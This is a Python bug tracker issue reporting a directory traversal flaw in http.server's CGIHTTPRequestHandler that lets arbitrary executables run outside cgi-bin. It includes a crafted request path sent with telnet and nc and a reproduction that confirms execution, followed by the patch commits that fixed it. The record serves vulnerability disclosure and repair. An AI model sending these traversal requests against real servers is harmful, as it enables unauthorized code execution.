Directory traversal attack for CGIHTTPRequestHandler

[AlexanderKruppa]

BPO	19435
Nosy	@warsaw, @birkenfeld, @vstinner, @larryhastings, @tiran, @benjaminp, @ned-deily, @Janzert
Files	cgi.patch

^{Note: these values reflect the state of the issue at the time it was migrated and might not reflect the current state.}

Show more details

GitHub fields:

assignee = 'https://github.com/tiran'
closed_at = <Date 2013-10-30.16:51:29.356>
created_at = <Date 2013-10-29.16:34:01.527>
labels = ['type-security', 'library', 'release-blocker']
title = 'Directory traversal attack for CGIHTTPRequestHandler'
updated_at = <Date 2014-07-13.05:34:43.791>
user = 'https://bugs.python.org/AlexanderKruppa'

bugs.python.org fields:

activity = <Date 2014-07-13.05:34:43.791>
actor = 'ned.deily'
assignee = 'christian.heimes'
closed = True
closed_date = <Date 2013-10-30.16:51:29.356>
closer = 'python-dev'
components = ['Library (Lib)']
creation = <Date 2013-10-29.16:34:01.527>
creator = 'Alexander.Kruppa'
dependencies = []
files = ['32413']
hgrepos = []
issue_num = 19435
keywords = ['patch']
message_count = 6.0
messages = ['201645', '201647', '201673', '201747', '222911', '222913']
nosy_count = 12.0
nosy_names = ['barry', 'georg.brandl', 'vstinner', 'larry', 'christian.heimes', 'benjamin.peterson', 'ned.deily', 'Arfrever', 'python-dev', 'janzert', 'Alexander.Kruppa', 'glondu']
pr_nums = []
priority = 'release blocker'
resolution = 'fixed'
stage = 'resolved'
status = 'closed'
superseder = None
type = 'security'
url = 'https://bugs.python.org/issue19435'
versions = ['Python 2.7', 'Python 3.2', 'Python 3.3', 'Python 3.4']

[AlexanderKruppa]

An error in separating the path and filename of the CGI script to run in http.server.CGIHTTPRequestHandler allows running arbitrary executables in the directory under which the server was started.

The problem is that in CGIHTTPRequestHandler we have:

  def run_cgi(self):    
      """Execute a CGI script."""    
      path = self.path    
      dir, rest = self.cgi_info    
  
      i = path.find('/', len(dir) + 1)    

where path is the uncollapsed path in the URL, but cgi_info contains the first path segment and the rest from the *collapsed* path as filled in by is_cgi(), so indexing into path via len(dir) is incorrect.

An example exploit is giving the request path:

///////////badscript.sh/../cgi-bin/cgi.sh

Note that Firefox and wget at least simplify the path in the request; to make sure this exact path is used, do for example:

(echo "GET ///////////badscript.sh/../cgi-bin/cgi.sh HTTP/1.1"; echo) | telnet localhost 4443

This causes the CGIHTTPRequestHandler to execute the badscript.sh file in the directory in which the server was started, so script execution is not restricted to the cgi-bin/ or htbin/ subdirectories.

[tiran]

I can confirm the issue:

$ mkdir www
$ cd www
$ cat << EOF > badscript.sh
#!/bin/sh
echo hacked
EOF
$ chmod +x badscript.sh
$ ../python -m http.server --cgi


$ echo "GET ///////////badscript.sh/../cgi-bin/cgi.sh HTTP/1.1" | nc localhost 8000
HTTP/1.0 200 Script output follows
Server: SimpleHTTP/0.6 Python/3.4.0a4+
Date: Tue, 29 Oct 2013 16:47:22 GMT
hacked

[benjaminp]

Patch

[python-dev]

New changeset e4fe8fcaef0d by Benjamin Peterson in branch '2.7':
use the collapsed path in the run_cgi method (closes bpo-19435)
http://hg.python.org/cpython/rev/e4fe8fcaef0d

New changeset b1ddcb220a7f by Benjamin Peterson in branch '3.1':
use the collapsed path in the run_cgi method (closes bpo-19435)
http://hg.python.org/cpython/rev/b1ddcb220a7f

New changeset dda1a32748e0 by Benjamin Peterson in branch '3.2':
merge 3.1 (bpo-19435)
http://hg.python.org/cpython/rev/dda1a32748e0

New changeset 544b654d000c by Benjamin Peterson in branch '3.3':
merge 3.2 (bpo-19435)
http://hg.python.org/cpython/rev/544b654d000c

New changeset 493a99acaf00 by Benjamin Peterson in branch 'default':
merge 3.3 (bpo-19435)
http://hg.python.org/cpython/rev/493a99acaf00

[python-dev]

New changeset d367ea865ea4 by Ned Deily in branch '2.7':
Issue bpo-21323: Fix CGIHTTPServer to again handle scripts in CGI subdirectories,
http://hg.python.org/cpython/rev/d367ea865ea4

New changeset 4de94641ba3e by Ned Deily in branch '3.2':
Issue bpo-21323: Fix http.server to again handle scripts in CGI subdirectories,
http://hg.python.org/cpython/rev/4de94641ba3e

New changeset b957f475e41e by Ned Deily in branch '3.3':
Issue bpo-21323: Fix http.server to again handle scripts in CGI subdirectories,
http://hg.python.org/cpython/rev/b957f475e41e

New changeset 385f4406dc26 by Ned Deily in branch '3.4':
Issue bpo-21323: Fix http.server to again handle scripts in CGI subdirectories,
http://hg.python.org/cpython/rev/385f4406dc26

New changeset 22e5a85ba840 by Ned Deily in branch 'default':
Issue bpo-21323: Fix http.server to again handle scripts in CGI subdirectories,
http://hg.python.org/cpython/rev/22e5a85ba840

[ned-deily]

See bpo-21323 for details of a problem introduced by the original fixes for this problem and now fixed (except for 3.1 which is now end-of-life).